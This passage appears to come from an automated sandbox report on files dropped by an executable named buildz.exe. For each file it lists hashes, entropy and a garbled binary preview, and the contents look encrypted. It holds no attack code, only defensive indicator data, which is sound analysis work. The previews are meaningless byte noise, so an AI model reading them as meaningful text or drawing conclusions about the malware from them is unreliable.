                        Category:dropped
                        Size (bytes):1186
                        Entropy (8bit):7.838867484275307
                        Encrypted:false
                        SSDEEP:24:tO9ho4iju7H3t3wHA4yBCzNOGu9gp41eLs86SVFhOTxGbD:tO9i4iju7dyA40CzNOJh4grS7hONUD
                        MD5:EEAEE6961ACB5AB099E0E195364C0F04
                        SHA1:447FA9FBEFC8DA2864E6B606A7B2E257091C06C2
                        SHA-256:0C6FC7F4AF36D212C1301C5EA7B23BFF2724413F4F08FADB78B21C5BAA40042A
                        SHA-512:CA1E2CD58203C4814918CE38FADF62B28C7A0971D96E1D44D1EF628DA494603801C2671E421881853A733D7178BF727A8F75821F987E1850D905969A0EAF9E45
                        Malicious:false
                        Preview:<?xml...0..h......J](.$..e?.d;.N............b'Uc..wW'Tsx......80..t....O..;[.....S.<.@v.W..g..E.Qo...q....C...t...nu.w.M+....l..*$..#...F.!.u%..H%'.b.m...?]..~.(..0..,..hK........zcd....p.A.v....B.'....l..bf*z..^(....g.]S.dpzR..B]..".Di.^...l...zS_../..B...*..pM....7...n.......Es....../.o[9:t..q...Q.........eE/..qRL..jj&....Q....AoUN.... ..y.[X.&...F...u~9..r.)...x..,8i5W....E.......RS..[p.o#V....G._..........3N....o..=o..i ..w....L..O..e.7......~Ii..X.b._.......n\.[.~._.3..aO.L...Y.kOv.[M]W1........$1....AE*O.?vM.E...w....O.,.4..~.d..).....v.H.)I..........4......kT..zJ...&...W'....-..]o7p.?...GG....|V8.3.B..Wn..R._......5.....7......MD.5..].l)}jn...".V..gvp}...1......)y6.;....g..3Oq...;.}.....X.......l..........@,.-_.*p.4z..R.g..U.KI9)<.z..Jy...+..0>....Zt....6.......re.i......4..Y.<..!.=..x..x../.X.[..?|C7..`0fKs8.}.....W.%8.@}...-b..../1.y.9.....:..;...mR..s.hy.....>.+*..c..s..K.uL"..V1TUe....,..T......K.....f....K..6I.O.a........
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1291
                        Entropy (8bit):7.8250579469001895
                        Encrypted:false
                        SSDEEP:24:cxE27DcFKa6t7iqT5P6yc2bI3tA5+F7sypO2o7CPJGVj6AXNQ0yoiGbD:cq23c4a6t7iq9lc2Id0O7zpM7gJsj/dP
                        MD5:2AAB62BD9A3BEACEA8262C428929EE0E
                        SHA1:5FEE5A66868F58BC8E1F35F8F45116C63001F9D3
                        SHA-256:4FEA8F7E3997FCFC0AC16DA5DD52E38F0C75D550EF0D04DF3B87CC7B1BA23663
                        SHA-512:DE016DD391BC36FE9B8450F2D5CF6B841188C2D337E9C62A66641F665A910B0D452D3C9AA35BB61C1B5659071F7C55E081AC5E51C14C205B4C7FD5928A960E41
                        Malicious:false
                        Preview:<?xmlB.@..j.T..e.=.6.......c.9;l..|L9O...^..&V..y9Q...q...u.P.....+....m....c2.J......+.$...u.p{....X..!.+.Ma..7....m........vA..w.;Ch..O'..hi..I.2n...?.&....l.@[..0.Q2.........q.V........M..eA .\.)....9...a.G..;q..:....L2..P..=......._..C.....*..z......N..&*.e..q..@..Gtr...2.l..f$=...C....*.j@W.[...1.=...=3y.G.X52+1..%....Pc.......!.N..D..`.....;......./..4.o.6..h..7.6T.n......;X#...'..M..Q.7...x....8......-..Z......#.....jx3...}qjHL.....4....{...-O?"<6.h`.K..lW.S.U#.}...|....@!....&.E........].tZ..%........HOO.....gV.\.}.&..R._.8.8I~w.-.e.i'...L...N...[.I%..nn.~.. .....P=.."...gh..Q......h.......U.....i.h....\4M.(y.o......p.....^..X..+.....3...Z...E.8...=...qO.g........-.A~D".X_x*Pd..S.0Cn..V....g....K'q..M..m.5ON+.....n...)Jb_;......9...U`.....d...$(Q....E.9.7.0[.$.......26.h.V..#.!D.e..F.s..L..[.`....`..=.#2..Ot.r+......PR.%..f*B..eQ.mue.w..ED.O.0].[..6......K.^Y...wQ.D)..rnq......... j..U...9!>PS0.&...........?..9.....*7.L
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1737
                        Entropy (8bit):7.893501447068993
                        Encrypted:false
                        SSDEEP:48:l6tWlNuWOz3qM5pa2LJ+atcHXkNtUUBbUD:sdWOG8a2sbHXkbvA
                        MD5:05765ED032E53718F0B0CBD43FF68528
                        SHA1:B595B3AD9D1F54BFB6DC77BB9DA9FB359AAD3866
                        SHA-256:8F3E1290C7262C160C454EA414F4C2DD231C294340168C6BFCDB8123AD810094
                        SHA-512:DFFCBCC71AEAE3DE5DC1097ED38A8F474DFA17EDAA5E4F76A049AAD0868FD75CBB61E7D0F01CB3F4553660D81842666F63668C85D59455D68636AB6A2D202387
                        Malicious:false
                        Preview:<?xml...k.I.LE.....S.....f"."T.r..`.%...^1....:.-.9.$..2...T9-..Y...$..v.NE.o.).b5O\.!\..Q....".s...3%.V....*.:r.....V.FF=...x.o...,x.b....h.r5.......|q......,..~x....J*.[a.N.0z$..J.R...qF....(....PBG=..v........+@...@...y.0_...d....G[/.......YgMr.....W.I?...2".Z#dCy...4......u...p.:.Ei.x....i.vl_....I.1....].+.8l.K.8.t.H+..I@T..|p...#Vcd...`k..["S%.9."......u.`-w>.-up.;..#..]z..y..m..J.#(.d.w.."..k..k.p.]g...e..!.^......8.s..R....\.i.U(.=t...p..Q".....W..].jkt.#~..u=.-.....G..J.%Xh*......2T:'.......`E.r.|...@G....'q:"a.e..G..f([B.\..x{E`i.3.A..(....F|y......-....P..^.i..M..l...N.^..X....["&.m..aYR ..c@;..vq).0ad.oG..H.._.=...Z....DiW.6.t......A?lZ..U...r<.D7R.w.O...7l...6.0.(..b [].Wp=.=..H..d.k./.....I4p..}..MQ....|.....C._........A0.qt...e).5sTR.we.>..%...%.#|....T../.......N..>...!.......?...E..b.#..1.&z...d....q\. l.u.E.K.#|3S(Lo.sm.]~......:i...K.)....5w.0nh.5`....s.........T{..Hu.x.+..W..`4.cM8..ll..S...[...K...U....o...JT....WKA..]..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1354
                        Entropy (8bit):7.847943615769798
                        Encrypted:false
                        SSDEEP:24:OUjZLw1gNtOxGEdFaYdBCS4FeiP0GebMn6E8uED6mIJVDQTMm55bdSxey0MoGbD:OUjZs+NtOx/FaZrP0GebU6EKRIDDnKwb
                        MD5:9018E0E24A350A8B49D9B7B30DD8DD9D
                        SHA1:A42EDB722CDEA00F955096B90C452D29C9F97B03
                        SHA-256:8BCAE681871A65638FFF5E9B86F2A5F3165F908BFA27620563952C8C4BAACD21
                        SHA-512:800F2E3552A9A764B8D9230FE63317E41E487D052708DE1E7787FECDFDC8993CBF26EA688701D9B6964AE76E0D069D6E3C8C37013BD6C3608DD51942A47B2290
                        Malicious:false
                        Preview:<?xml^..)_{.....?:...i..}....t.......O.d.C.~g..^.*F*c.7KiK>.r....VZc24.E.3b=U....L..j`.V.x.;.n.9<|.(;...|.m7.?._.L.._.;....J..V.}...h.8W.%....N?.P.hgdGj6.4..._.\.2...YJ.A.m.I..l/....7k.s.t....;.p..&..-....Q..I...8....O8..7.`...uof..\2.H.A.c.{J+....R#..X;xm:s.>...u...!...t....4...0)k......|.N.....%.........g...P...t8..!&/...S..I.i..lPYO.. ..w.}.XJNu.kk.;U.....`.*.g4.m(..n.CL.......... &.a...,).?.3.<.#K....|L...n.#:..v."8+...i(..E.n..ii!..{m...@Y&w.....!.....#......@.c_D..h...,RL7.........2J..J..>..O........$...L.kB........`.F..w.>..*Y*....T.;WR..\........sy..J......_..!...B&.eM'..;.0~..dJ....W.".....]...i}2...y...4......gG...J....}...+...05-...!.!.R.d;.o.@M..S.o4......X.T.8..... ..&.`..O`......`,...4......;i...<..`..<._J(...N......R..........=.#..OP..|.$.;.6...;.<e.G94lBV...[n>.W..Cl....N.....ke>..?i.........;c..%l.6#..WtFwy,..*G3_..'iR.f...Q..u.V...W.ou..H..a...n:....56.E..BM.c..6>.\.UY_..+..O.~O.V.?*.%...g#T.....J).I..{dG....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1864
                        Entropy (8bit):7.888677704432436
                        Encrypted:false
                        SSDEEP:48:AlLHzcJw272TXq2rb/qOtHIY16UKK0HfqY/xvVdfSBUD:mjoJ37mr2sHF1CK0iY/xvVdKBA
                        MD5:858BB609D05110C1A5EF24683E21C722
                        SHA1:F145920F4FE9A2582ADA003523235755A594D2BA
                        SHA-256:3B509B65D572916ED7A7A2BC951F277832F732C7AC90DFB91918511F84F83E98
                        SHA-512:1FC035029DEB8FA1DA498D417D78EE6DD13333856A42359D07420B6A770AE6560042DB7254AABAF2420016267A7B24CFEE9C77537DE31E685AAB1E8F07E228DD
                        Malicious:false
                        Preview:<?xml..(...Md.jg..7..I.2....s...T....S.......K.2...%!.ea>..2..FT3}@.............[N..p.P...F..@..J.F...S.H.8..V.q...mqo..0..L..C...j...;%Qm^...L..iH./.N^...'...`1. .........e..F.o~...\.5.......=.&v.._.4./.y....N...{h.d....]Q^J..=X.....M...8e.#V..=.w.sY.\.Aq w.,..U....m@n.....1O<r@..L.UvS@.wv..J..4..x.2w..U.......-|L.....z..\b.m.A.......V.L_?4.....M...r...%.Z.2uWT..m.K..G.. ..R.#6\.~..-...]|...V..lq....}.Lhd.U...S..f;C..........o.....&.+.J..O...)....,..X.....Z.Zb.5Y...j\.2\Y.(.H`q.ss.W/.wPg#...R....."... .+%...orB....!..8X...@..N...|%..T# ...][.T....S.......X.....k..t#....p......^...F...@......".M ........l.c..H.`.rn./..{d.l...\.b...o.....m.....N..UU..r.[F..{..&_m.`..v$]...(.#.../&...YoJ*...........:..J..../M1bj.N"sxr..L>.....s.......mS..}2....h..0.....e.....g..(.4S;F...*qc...`.\..?jK.N..gc..RF..f..=5...U._....:..<...3C..H^a.<S.....IX...H2I^Y%..ze.q..f...:.....|.i..3.t.....M........b.j6.R..a./.WE.c}q9sJhu.-...J.0+.l..(...8...z./n.Q-..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1509
                        Entropy (8bit):7.876483251370861
                        Encrypted:false
                        SSDEEP:24:SgcqF+npWutN3GfXjP4ZEVqhCvAMJwYeiwSZthoSEX+qb9aQlQuhDCySRGbD:LqMS4j4vmTJwCw28SEX+tQS9dRUD
                        MD5:C2E10103629690855413EF3DB95A353A
                        SHA1:5BCFBEE2836BCEDA02CA5CAB548406C3A2CCD8B0
                        SHA-256:C20A477F50D52469C2BF727B6E30D1403171ED1925BCB337EFF4FE4C19D58C30
                        SHA-512:7CBAB7CFCF758300C755D18C6FED1DD3B3EBBA9BBDB465CA930B2582E07F6A5706C28AAB4AD819D0147F76482633E5E7A0B95D0646BC0EF221FF5880AFF32780
                        Malicious:false
                        Preview:<?xml..#....hw..=.~.....{3..6.".....,....V.......^....s_j.*.<...oyg/..].m<.Ed.....n..."U..U.._.Ak.%.....d....'.`.>..i......v6.: 8..0.aB._o...e.....$..w..M..C..JT....H.8..~.8.j..I......d.....L07.ta......t!...H.....9.<v...|...C.%.8........3...g.....0.?b....U.=..0.....{.U..........5.......0L....T+.6...9..C.Jg..1.......?#......m....q|PJs).tN.7...|^h.>.m..F;..C.....Z..&..(..;.SI....2..+,<..."..Y.6.Z."..).k)t..7_.......$x.p...V...p.Q...'.2...g....{..t.`..W.B*^'...~.....; ..M...E.c......X.W%...H.....b....1..`..Uk..%.......(fU......;.s-1t.<.C.0......X3J7..y.F{....w_%.j..+... _.}B...[.Qfw....c..V..8i.r.n3..A..9.n.Z.{....w.';.y.f.C..t6.;....Aa.3l...._.8....D.g......F\h.(.&Q.....8..@.;.....f...$l?..*6...`m*...%{...MW..~.5.)..n...x+z.Z.mDI$..4......U.N..G...@Z...........tC...S..'.".r.V.....LGL.~Q.".2~..B..#....S.'.._.B...B... __O..;...+......;....\%(...%#...ch/.@.x..I...`=gP....I..%?x..XV./D...]...2s..E..O...;~...R.!....W.qf!I....~h.A.)t.u."...%.......^.=.".1].
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2007
                        Entropy (8bit):7.895884269477272
                        Encrypted:false
                        SSDEEP:48:AnOz0BgvK5rK91fXCekHo4zb2mUnwU5jj8y5zh+QLyW59Ar/6UD:ic8R5K3bMb2Vn3jL5ne/6A
                        MD5:49E845E64124430EBBDC200990FC859F
                        SHA1:97FBEA8671ADB7C07A53A8326AD00FEF52358DA8
                        SHA-256:47DEAA821097A9760473294B67EA7E813547D1B999D95A6AE358C4B12A3999DC
                        SHA-512:3BCE4F26BA7725B8A57C415DAC28BF0C29BCD6EDA0A6531B00AD2261F2BE4E084FD02FF0640B02912A8CE52D7F3E13F55AC5A3BC1153F000412AFD32FA44D468
                        Malicious:false
                        Preview:<?xml..*...&.1..;._...G.g@....j?/.D1.......:.3......0W...E.W...fo..*.......y6.]Y.n...U~....Q.o.ufq..F...B.8q..m^.\}C...E.u...M...O@.=.....{X.v.sr.. [Ks.`b..Fve..;og.f.......'._&.Q.U.&...uqC.AO.m.../;nb, ...y...........=...s1. .n...#.4./(L........v.-.<7 .....@...x..dN......\.@.*..._..8...IX....6..=g....5....[....H..*.W......7v?......P9..r...U...l ..~.Tv8.D......R.M2......+....;.....]...{.BG..]...z....fY.Z....E..Y2t.K..a..Y&.qG......<..0.B.....g.....+=.nl....(.z....a.. .P......vU....f..../.J.c....ty<0,g....#...4..A.!|..'b.......U......O.. "Slm.d+M.L.Z.....D.X.I....T.P.)`!%..r...Z.@T..NViUv.%2..@;.s&.Y.g/..S$.YL_oA$..zJ...Q9..o*.....Q..H.*..M......H...W....]8..n}sy\..0......0H.....=....J<..|U..........[....a.C....{.z. .qG}.v......'Qk....j........w.J....;.`B...<'.s1AD.f.F.k.M.!f.`..AZQ.:Z....<\h..s.g...<..Z...C.z...+.o!..s..=&C5$'.|?Kj.%.........9dI.....X*...;..@.e'..a.......A.'?WT"p]B...'..yObY_v_..&..........C.....a....Q3{i...E..@... .?<
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1276
                        Entropy (8bit):7.845661438164447
                        Encrypted:false
                        SSDEEP:24:lOf7Wb6GU/wbk9khs9FxljYXr3m/M3pt4nx476Au2HlknjEkWgp9+ZpOCSNipQcS:lsmtvSLSm/6UxTZEHge/SwiqXzHUD
                        MD5:78B391DE58AD7682B713AF85F8932B39
                        SHA1:C46FFDB53359523FDB5DA772AE29539B7C30846D
                        SHA-256:CCAF40AB0FD02A3516F2308C5F09D091096F48D18A2801078021E55F71481F0A
                        SHA-512:A1CEAB9FC73EBB1CA14A6E4B11CE3EA7578D1A42450E117E3A4BE922DACF28BFAC9002DE18FF48B8ABA9B97EE80784EDFB5C0EFB447A8BEF43DA29AB19345546
                        Malicious:false
                        Preview:<?xml...s-...F.5..D].%....d.-1.xL.....m.R....f...#:tri.....Q.Q.e._.US[*.K....VH\..yC..:}2idA9.I...z.P....1.dW|.T.5.t.74....;PU.{..q..j...........vX....j......n.g.H.X..p..X......s....;.........W...SA.*..bx..}...<(Z..T...B.w.4...S.Y.......Mbj..'..!iS..e.-=."...^..........~.._..9."..I.r.q../...sm....m.....k..*..-..d.....)G.I...*.]Pn.e... ...../..m.U.h'ux.I^....@.D.n..$..g.-z.A..,..vt.4.&...%.F.=E.V.k"0)vp.S.a..6..,#.#O?.BDT.L.j|..)....C2.....T.x...G..j......o.;..`...$jw..-...S.W.&vh.....7;.k.... .J......T../.N.\.".........w.l3g]....,I3....f.....N.?..q..F.VD.x..{.`....k.^...8.5LO'.".......,..q.....cdbw..m E...<..{.X.5...o......\yry.O........|.....X.e[:b....N.h3........+..6G.!....j.C.C..rI...).8.T..|J Y..=..\wbn..\.!..c...:J.._.^1...Bn.h..y.D=,..v....T~...T./....0.......s..8.a.k>.....Ogj..)'t<u8.....!.a.?.m..."..~3.J.M.c.O..O..AS..5.Q........y4....2`4.{.K.....d.Y...{...jq7V.4.......v.`.g....:FQ..*...9..!*;?Ws.e.M@;L....".@.t2.e"...K.#.].?.y$1.C&-
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2037
                        Entropy (8bit):7.9054898192144725
                        Encrypted:false
                        SSDEEP:48:FNoe47SNfnmAF+TYi6CFrZVEZHng1zEZUD:FNoe4OVnJ+miZVSHg1zWA
                        MD5:AB0A12E55C17158F00D52414BF22C945
                        SHA1:DB21108B66293EA81E1F8E397912FD673AB8DC9E
                        SHA-256:932702C454976FE1918008EECD4ACFD1F9946E00854AAA51C12F9E648E81AA4D
                        SHA-512:86C00E35B3AA07AFF269CFB7095869C0E7E439D44CDC59F372F5DEE71C5082B0A7CA8FE9A8CD03CE2B72F2A83FB58F93AA61F3FEA250EDC1ED93E68BE7B3A1A1
                        Malicious:false
                        Preview:<?xml.v.6..NQN^..]e.u.L.=...8.x..;..s..<Rd....[.CX0O.....8..p.p.r<l.92AB...2.3R$f...e......C...|A..4...WR6.EQr.D.0..%..+.I.......1..Ju}...r...6..3...]..i..).b..V....F......'5!..R.8..~g.]..1.J.O..1....6-....`...e!.r......V`....F...2...W..CKw....;UP..;.d...A../.=..;.*.K..q....'._...rg]........"SDEtc..L.....9...C..u.....ex!..E..TY...E.L~..G.y.:CE/.;ZS....g.......B7.i....J....5m........R..q.b#......{(..\e...y...2c.0...3.2..].v)...=G......P....`b*..H.l;H8yC..VH......j.G...)..*.....*b?.JMF..l......vH.....#.{.?~.......|[....`T.`M.5(..As.....>.R.OP..vkF.....-.../..........&........&t.H...%..ot6n8..r.L1.>2*......5jC1z'.m...).}.DuZ....."...a?.w&.[..._?g_L.^..t..".v....%o#.D..EI~.3..'...'..1a...t.)|...-/?..{y.pf.....F.(.ar.&..a.=.....3.1...\.IPs..Q..\7.?.^..Q7\b{YP..t..D6a....v...k..o...,....k/;|#....".9.?.BTa.v...t8n.H.( .G.}.[.`..5.D...gK-..9.(.A......Rh......Qb.yl..M7........"........n.i._..l$n.'.T.M..$..-gF| ._.Z..D.j....@...t!,..hNM..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1180
                        Entropy (8bit):7.838328407887341
                        Encrypted:false
                        SSDEEP:24:Hf3b8J1TR2aI7H1KCztB2nRniwTe3VEO597EzCRoGbD:/3b8J1TsaMHiRn5eRZEzCeUD
                        MD5:3E1879305213505DBEA840E6C4E7EFF3
                        SHA1:CBA9ACC1D085C9C58C6CDD33BB36DA03150F4EF4
                        SHA-256:38DB6F23A37537ECC5FE07C8690D27500167F90D40C3C0C78216235166440C45
                        SHA-512:CCB3C74EC205E473066C3A8BF76026AAF4959758C2779D945B5DF69E8B34F9F30F6BF31E669A8CC671BC5421FAE672B0579F3A94CF3E58BF99547A611BFCC910
                        Malicious:false
                        Preview:<?xml).%...,Z{..;PU...'...^(p2.f2.bZ.....*bxeu...P...>I....n...~-..R].yA...t...@.b@*...J.....-q..i1\.#.h..H'[\........0Pu...+.r./L....QY:.L...I.9&.L+.k..^>2.H9......xX8e.f.+....A..Q..I,.0g..[\y.....m\.......2&....3.......E...t.....#e.?A.9.W...cs.(...H.....}f.@..n..C.j$..I...\&.i.G.zp...C...SO.J...?....#.j.B...?..H..:...pqN.=.!.....'..+..6W..Z..2....k....fRV.iw....0...~..(s~..Y.7.Z......5f.I.x.....l...O.....G..........X...v.,#S..1... `....m.@<.*....Y...&g...6....T.......j.>...l....&g...KW..m.....r1h.........V.%...d...h.....Cmu..b$..l..-.....o..f..*..1.^j..+.F..._...H_$....)......y6:Yiu...F%.....9En.q....tF\.\..by@u..!..hj...;.....S.....j[...f.. fk.4.a..q....b.c,h...D.DBz..........wYRxO&..7.*g.+O.....P....l....R..,......".=..p.D/...7........s.H.[?.. .3......6...v../.f*<..|......f..A.t$..rT.......H.....`.wF.....P.S.$..*.......pp..vm........%.....V....r..(........a..>..,...G....E.>.&......??.4.......x....{3..pC..O. .C...C.?.Ie.-...
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):899
                        Entropy (8bit):7.753540329210637
                        Encrypted:false
                        SSDEEP:24:+rB/Cp5eaPLS8GnQZQQ3sVul+Bw2JpxCFQoOC6ggliGbD:+rBKzeaz1QQ2ul+qF92MUD
                        MD5:A94865E1AA0F9735546C4690517FD923
                        SHA1:C709485B0CE1B72DB4690EC20E06CE4C7401C96E
                        SHA-256:8930BA4655F5C9C2BBE5A661F1717E3E4B189A99BE5BEBB95866050BB6612BF2
                        SHA-512:7A7C5D7AF7D479677DC3249F380C45118957D86406B49638502D94CE2F7963BA77B875E72A23B028F718DE2308F6CE3F4A68688BF847D366ED0EA4A2999D935C
                        Malicious:false
                        Preview:<?xml..../.(.....X^..11.9I..........._<d..+|D..y.+...%@.=.. .Q.:......S.Q............@3Ne.E..q.y`..b.....*..=..hS.V...@.cd...M..S...+.p.>......B.E....KVa...4w...M.:.:.kb..2..t!..m,\.vi`....AI..x.6A..%..u,.Q..i=..!...."9...SOH.e$.....f?V.......TT.b81...y]..r.....h..-...(.)(.7...ACh.M.......2z......kj...7.0...#.oG".m....t..x...a.Ci.Fw@9.Q34:*..........H........y|<...}".2z..t....'...A..#....{.O..#c.sL....;...n.e..b..MV. ...S...(.>h}..c.1........D.(....]..\....T.F,.[:...I.......fT.o........V..+o?..($.r..,M?......U.%{n.h.aq..G.Z.v.D...dn..}<n.)Y...!.$....a=0.qr..w.f..Td.%v.T..d9..1...4.T..?Hi..^...M......L5Twfy.l*...~..0E..D.*......1Z]icF..k........xEp<B-.q...I.:.`D..].v.R.A.R...aK4.|n..h`....K.Q......1!kp2Y.."*7..a{*]....c.e...J_ .j.I.J....I..#...]..{a.G..e...Y#L.y.EdRvSqD59xL4qFRlN46qLGl69IpLPjDk6N4WPMGz{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):2224
                        Entropy (8bit):7.901919669632261
                        Encrypted:false
                        SSDEEP:48:3atmBtbDNXmskuX8g+AmcfOhAl0nswkLqvkmThxUD:qctbRWruX8gkcf0c0nsG8+xA
                        MD5:D7AD876D5B31CEEA9C5BF2CCB9DDD5E8
                        SHA1:F5272B1C7EFA728A658C1045ECE09F19F93366E5
                        SHA-256:7CCB61B54814416DFC23C1F66822EB3F6C953BB88CBCB6B3CBFC32DB1866FA3A
                        SHA-512:AA61D9C3C7251AF863ABA1EEAE318FC2E97C3D3D3F3623E74849376D831A9C4DE7B3D710FD7F84EAEDD51FA880883708852456D05797F86977445EE5452BAC48
                        Malicious:false
                        Preview:<?xmlp...."-....A....B....o.4....U/M.1........6.../W....a.9.c"E..?JP....6. ..&32P^i..@Y7M....YV.fv..+.&N.L...&..8)..6..w.%..V$....L..j...S.bU../.;......<e.U37......miG#U.[.r5..@.fqx!L.&..$.Uf3...#.N..YV(.%....mC.......4.......O.."...OGK.....ey..W..4r.[.k....!.f.~.......0....j....,.-...."./ec.5...Q.j..9E.z.)?9./.T...rw.I...........A.d.4%V.4..3.......O.A.9...x.....G...is].S...{....+..@.X.,d.....!).....4.....Yt.<.X..p../J9jB.0.9st>#tJz..w0*..uj.(...9.....O.......B..T..s.@.PV.V}Db.H.O!l:.......si.O.%nKI.o..Ev.E`..E..-.._$<..:A0..,q..s.up<.7(..,+I...y....w.8.l.P....t%...8.}?....e[-.7....A..$.K.&..~QQ..di.... =.Rj.X/..S.!.U."."...w.\q......%.fq<..I.0_....|...n....8{.s.&......Q....... o^F.F..cY..p)..&......R.s... e;..A..GS.=.r<N....x...`...e?....|...)q.*.a...Vi...+7.N.oM.\...b ...q..YC6=....fX...6.../1&.9v.q-..._.Y._W8.Y.#....[i..O.Ub{.M+...L.Z.s...6..P.\.Q.P.e..l.3....8C..r.+.&I.......J3...k.s.0P..{a.".!S.8B.Cr..4^.!?.#......(.G....
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1560
                        Entropy (8bit):7.86819629130208
                        Encrypted:false
                        SSDEEP:48:QZsaNIZpm9mXXYT1yu6ZKldkxmWFOE2bXUD:QZim9mYT1WZKldHcKXA
                        MD5:E778A03ABEC21F9147BD8A8114045092
                        SHA1:BCE0B2F6D27926AC9CB432A0CBB893CD3FAC731A
                        SHA-256:699EF7FF658FA0A52A9972A9C22C07EB76066A157EDCA3921722B3AA93DF1358
                        SHA-512:223710E510D42282F319A8930A037E102D1C13CCBF95AAADBA78D1390CAB22B8A511EE684DEA66760238B59D913ADA97BBC35823CFA4DAEB01335DF48A3F7FB2
                        Malicious:false
                        Preview:<?xmlmz.5...z....:......,..<.....%$......2.+.b.....U.f.~...a.2@...|..9.K(|.q.Y.[.\..Wp..".d+..'..dTp....c.e.(.........<.m.{?P...%.N..J.N.Y...1...H...xI.J.i&.p.#..y.Wi.ph@.s._.n..E...H.Zl.;..V.$.|7u.E.#.iu"~..VB..|.pJ.^..J.... .....JZ...=..wi.U.0B.L?.4.....&`........jN.C.uF..8.k-.d.....E.z.4.[.2-..........Je..'....}.3..nv%.....z%.0.s?...Tb.....g....+....1..r~......W...h...R.lb.<c...C.=+.#.q..l.}.V...!...l...EW@.)~)%....c.p..F.=..DX..B..w-2>..Y_..../...C0.........S.s.....M..xvAR_e...Lw..;.e.....0.P.v.WU..,....Z..gc..J..O........?.o....of..{.o.$.....A..5.H......B...l.K.?C_..nT.:~}.).}[.`.......&t.....-..nx..7.P.N....!...h..K...[..Y...,z........x..&..a....;.:....M.....{.k@.....4...`6K.SH..ol(....N.U..^F953.../...h........^6^...uB.3[...KXy.<.c.....x'd.....{Zp..../.....o...~+..<...:..:.h7.f..._..V.....t...<R$$..J6f....ca...T...$|.aS.[..>.)z.&.L,...O......:^.e..a.q....v.;..S'N..1.t..m......Y.....A....... 5......_..<7.OD......,mK.^.d.......8..
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1206
                        Entropy (8bit):7.816705302591295
                        Encrypted:false
                        SSDEEP:24:LNCw4GQXStTAMNguX+5DDmofKWsfj0IpLp09dmlXP+TGbD:LNz40tTU1R5fKD06Lp09dmUTUD
                        MD5:587E7F1D5A03744D4AFB8B1F88F47777
                        SHA1:79B8B9A2C4A2CBE9CC1E73A00583C98F07DBAE95
                        SHA-256:6F1D19A0876F19BEC32FE6FDC23186CD99A1BA611758BDC764528B8189051541
                        SHA-512:C8166CD003E8E237764EA9C3CF4D1A25D789CCCB359E26E975D82DB7CD31344D115A3C3A0A184EEE5B1A5B2073F563AEDFE982ACD3D4F907D346A8F439F7E6E1
                        Malicious:false
                        Preview:<?xml..T:".....z........J.....I.<.......+.}C...E....(_}..jy. .{.#?..c.....H..p...U.F.[.(d...\i.....J.>pN....`.?....s.[......)...M.....V.......".].1.M.)......f.....cs)X.F.)..UV.O......p4......fI.BM..T9..&!.B.........l%...@.lr.D\.@..w,..]..`..9.~wS?.?.z@.(...%..nB9..=..L...2..N..'avc%...?...l?U.S..3:.Ih. .._E...u..T..g$..20_..f.NBZ.{.<..y..J...-....%.F...h..M:....O..9..3.....A..G...5.4...O..`..`ToMrr.9e..(...<..D.Lq.z4..1."...W...d..L...4... ..A..."r....)..9.@..[=...:......O,}3....-...fH*....Da^...V......*..7.x.........4...^...E:k...."...5..:#..%.....:..HX...........o$.....9..%....>..2..'b.!.j...JK.."..S..E.....O..|.;L..i..b\8.3.ib.&o.=6q.%O..{0....g..3AE..sX...9.Yrx.?CG..y.?*n.....0,R...b...bF..+"...|/.b....9{.....~&..T...vT9....%n.U...../:b..T.U.vmgy.W+A.{.....SM..>..r0...k....<K/.E....?.7..-N..D*OQ.0...L~6.]..a{.....t..~.-.O.FJfQ_m...e.p/S).:.+...-.>y4|..aj....;..Gc.D....<.s....N.{.s;.....EZ.+..H..I..C7..+O.8'....x..r.^.P....'...-.....~..<..pHQ
                        Process:C:\Users\user\Desktop\buildz.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):738
                        Entropy (8bit):7.683870775576532
                        Encrypted:false
                        SSDEEP:12:irNFO/cipQ7y2OK6surdeMLldL8rccJvpKrCsX07zeDiMXLZoU8qfpyX26Gcii9a:4Nc/V72zQd8rtJhKrCsk7SXLZNvcvGbD
                        MD5:D8B16205E8DF7EF0FCA4030E9572BA0D
                        SHA1:E7D82EE6B012A231E675A7DE2533354AE71156BC
                        SHA-256:25E0CED0164BA118A931FDC0B94F1B7A182E3253331069D3BC507127262FF0A5
                        SHA-512:A2D1107F9112CF6137131DF25992ACF5959E2D77E82004FB47AA523F2780A3C26F3DFDEDDC1EFF7A59CA90EA9B05B33E82A276AC3B1B6909967750F49DD49671
                        Malicious:false
